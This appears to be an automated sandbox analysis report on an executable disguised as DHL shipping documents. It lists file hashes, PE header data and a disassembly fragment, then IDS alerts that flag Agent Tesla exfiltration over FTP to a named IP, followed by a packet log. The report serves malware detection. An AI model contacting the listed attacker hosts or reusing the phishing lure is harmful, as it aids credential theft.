Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 238592 |
Entropy (8bit): | 7.199093704147107 |
Encrypted: | false |
SSDEEP: | 6144:t+dqwNvo2UsXcshR7X3PBjEv3/JCvPNvFcK4Lin832cjifvblc3I:t4v3BjEf8vPvct9jOblCI |
MD5: | B093592D080675B700E02EAE9A3D6873 |
SHA1: | 565F9E7B6775DDF96B3F2FE3D1ACB0FD2108D27B |
SHA-256: | 93DA09F48FA60535DBDD8EE6183DFCED516D90599F00FCF1F83ECFF76C1BF9B0 |
SHA-512: | 69376AA69EBE174BE781923A8E923BC7E32367CD344B1AB8A01411EC9F9FFE14BC332C04A77C07057B38ED7323A45BD8DD89B5CE1FEC4CC656115BCB1533A27E |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15872 |
Entropy (8bit): | 7.408548410413596 |
Encrypted: | false |
SSDEEP: | 384:Wt4telw/ggBZTLg4OuH8ycTadkRmNt+eytbp:Rh/PBdLg4OW8yIVRmmT |
MD5: | 26FF44AF70A9D8D74B69D34273720A44 |
SHA1: | E56527FDB71CCCE5DBCBE4D4A310996E6D76603C |
SHA-256: | 4495098F8B39DE071A9B7DCE3CE7CB0C7DBCDE195A381DD6206A8B6725689F34 |
SHA-512: | 2AAED8731132911763D3032BE3CA2341F0FE3B47D051283524050828EE3D2E4C6F5CA2AA6C6BDD41469026BF868E6CE8E6A19C22F730D6668924FB862BAD7FB8 |
Malicious: | false |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 5.987397617073519 |
TrID: |
|
File name: | DHL Shipping Documents 0016229753_PDF.exe |
File size: | 92'672 bytes |
MD5: | c9bec29f669d714cd80e368748d7024c |
SHA1: | 26cbf10c3901a2d9d1023daca9d1e70212c52ae6 |
SHA256: | 80c5e03de930503d62103dea57d6590454e442612a394a2b235eb614746e2b3a |
SHA512: | 6c54c9f682521985ee5f1d1f3f07d50e3d27be09f61bb8b74311f778e2ea023f0b6448c475df8638501df90a3bc0453dd002e00170b9ed35d68e217e037bcf91 |
SSDEEP: | 1536:cglUP1b+o7TnB64EykqIj6ajjKvIbscI1V37bZ+fPtrpmOyT1ELm43QCv6TG:n+tCYnZkqIjjKQYcI1V37QfPHHwyDACi |
TLSH: | 70930831EFB4826ED6691672F52B47294377C0C93081FBDB4A05B4DE7D0331B9E28AA5 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.f.................f..........V.... ........@.. ....................................@................................ |
Icon Hash: | 00928e8e8686b000 |
Entrypoint: | 0x418456 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x66AC718D [Fri Aug 2 05:41:33 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Instruction |
---|
jmp dword ptr [00418464h] |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
cmp byte ptr [ecx+eax+00000000h], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [ebp+0066AC71h], cl |
add byte ptr [eax], al |
add byte ptr [edx], al |
add byte ptr [eax], al |
add byte ptr [eax+eax+00h], al |
add byte ptr [eax-77FFFE7Ch], cl |
add word ptr [eax], ax |
push edx |
push ebx |
inc esp |
push ebx |
xchg dword ptr [ecx], esi |
or bl, dl |
push edx |
pop ebp |
inc esp |
mov bh, F5h |
mov esp, 672AC6A6h |
add dword ptr [eax], eax |
add byte ptr [eax], al |
inc ebx |
cmp bl, byte ptr [ebp+edx*2+73h] |
jc 00007F8D3CD39BD6h |
pop esp |
arpl word ptr [ecx+73h], sp |
push 5C74756Fh |
inc esp |
jnc 00007F8D3CD39BCEh |
je 00007F8D3CD39BD1h |
jo 00007F8D3CD39BBEh |
dec edi |
jne 00007F8D3CD39BD6h |
jo 00007F8D3CD39BD7h |
je 00007F8D3CD39BD5h |
pop esp |
dec ebp |
popad |
jp 00007F8D3CD39BD1h |
jo 00007F8D3CD39BC8h |
bound eax, dword ptr [eax] |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18408 | 0x4c | .text |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a000 | 0xc | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1846c | 0x1c | .text |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x18464 | 0x8 | .text |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x2000 | 0x164cc | 0x16600 | feec1aa5499446836e70bd4ef8a75817 | False | 0.3992994937150838 | data | 6.022088554504293 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.reloc | 0x1a000 | 0xc | 0x200 | 4d0a5ae683f3bb0722d485fd69908d52 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
DLL | Import |
---|---|
mscoree.dll | _CorExeMain |
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
2024-08-02T15:02:16.556150+0200 | TCP | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 49709 | 47808 | 192.168.2.9 | 108.179.234.136 |
2024-08-02T15:02:12.198468+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
2024-08-02T15:02:10.477622+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
2024-08-02T15:02:16.550510+0200 | TCP | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 49709 | 47808 | 192.168.2.9 | 108.179.234.136 |
2024-08-02T15:02:16.074554+0200 | TCP | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Aug 2, 2024 15:02:00.345972061 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
Aug 2, 2024 15:02:02.470907927 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:02.471060991 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:02.736515045 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:02.752197981 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
Aug 2, 2024 15:02:07.564659119 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
Aug 2, 2024 15:02:08.767766953 CEST | 49673 | 443 | 192.168.2.9 | 204.79.197.203 |
Aug 2, 2024 15:02:09.558975935 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:09.559056997 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:09.559289932 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:09.586723089 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:09.586757898 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.079090118 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.079324007 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.188405037 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.188424110 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.188828945 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.189019918 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.190865993 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.236501932 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.477637053 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.477684021 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.477711916 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.477720976 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.477762938 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.477762938 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.477941036 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.478022099 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.478023052 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.478033066 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.478090048 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.478123903 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.478157043 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.478159904 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.478159904 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.478159904 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.478159904 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.478168964 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.478195906 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.478210926 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.478379965 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.478379965 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.478387117 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.478477001 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.559781075 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.559916019 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:10.559963942 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.560025930 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.579720020 CEST | 49706 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:10.579756975 CEST | 443 | 49706 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:11.389694929 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:11.389740944 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:11.389837980 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:11.390117884 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:11.390134096 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:11.895293951 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:11.895359039 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:11.896071911 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:11.896085024 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:11.896284103 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:11.896290064 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.080311060 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:12.080327034 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:12.198489904 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198544025 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198579073 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198615074 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198643923 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198671103 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198697090 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198736906 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.198736906 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.198738098 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.198738098 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.198765993 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198781967 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.198812962 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.198929071 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198967934 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.198972940 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.198986053 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.199018002 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.279582024 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.279694080 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291107893 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291155100 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291184902 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291193008 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291208982 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291220903 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291266918 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291271925 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291311979 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291508913 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291558027 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291563988 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291575909 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291601896 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291630983 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291651964 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291697979 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291697979 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291707039 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.291728973 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.291763067 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.292315006 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.292361975 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.292368889 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.292407990 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.292495012 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.292546988 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.292552948 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.292589903 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.293252945 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.293308020 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.293323040 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.293366909 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.293373108 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.293382883 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.293418884 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.293425083 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.293469906 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.293977022 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.294030905 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.294039011 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.294187069 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.345921993 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:12.363264084 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.363329887 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.363329887 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.363354921 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.363370895 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.363415956 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.384895086 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.384994984 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.385019064 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.385026932 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.385040045 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.385067940 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.385133982 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.385282993 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.385335922 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.385685921 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.385750055 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.385797024 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.385920048 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.386549950 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.386673927 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.386708021 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.386765957 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.387497902 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.387552023 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.387645960 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.387695074 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.387710094 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.387742043 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.388505936 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.388535976 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.388566971 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.388580084 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.388601065 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.388631105 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.389254093 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.389312029 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.389364004 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.389410019 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.390480042 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.390526056 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.457319975 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.457375050 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.457402945 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.457433939 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.457447052 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.457475901 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.478864908 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.478926897 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.478976011 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.479015112 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.479036093 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.479048014 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.479057074 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.479084969 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.479101896 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.479149103 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.479355097 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.479389906 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.479408979 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.479415894 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.479429960 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.479463100 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.479588985 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.479640007 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.480159998 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
